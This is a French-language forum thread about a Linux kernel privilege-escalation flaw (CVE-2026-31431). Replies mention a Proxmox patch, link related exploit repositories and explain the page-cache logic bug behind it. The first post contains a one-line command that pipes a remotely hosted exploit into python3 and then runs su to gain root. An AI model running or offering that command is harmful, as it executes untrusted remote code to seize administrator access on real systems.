CVE noyau linux

dino · April 30, 2026, 10:53am

Bonjour,

Faille de sécurité dans tous les linux depuis 2017 permettant un accès administrateur depuis n’importe quel compte utilisateur:

https://security-tracker.debian.org/tracker/CVE-2026-31431

$ curl https://copy.fail/exp | python3 && su

dino

dino · April 30, 2026, 1:13pm

proxmox a sortie un kernel v7 qui corrige donc la faille

Meewan · May 7, 2026, 10:53pm

et la petite soeur GitHub - V4bel/dirtyfrag · GitHub

pas encore de CVE ni de patch

tcit · May 8, 2026, 9:42am

Et le petit dernier GitHub - 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo: Copy Fail 2: Electric Boogaloo · GitHub

kepon · May 8, 2026, 10:00am

Bah c’est pas bientôt fini ? on fait un focus que je ne vois pas habituellement ou il se passe un vrai truc ?

ppom · May 8, 2026, 5:29pm

La première faille portait sur un bypass de la modification en RAM du cache d’un fichier sur disque.
Du coup tant le que cache de ce fichier reste en RAM, c’est comme si le fichier avait été modifié pour tout le système.
Les chercheurs en sécurité doivent chercher partout dans Linux si ce défaut logique est pas présent ailleurs… Et ça a été trouvé à 2 autres endroits. Quelle angoisse ^^’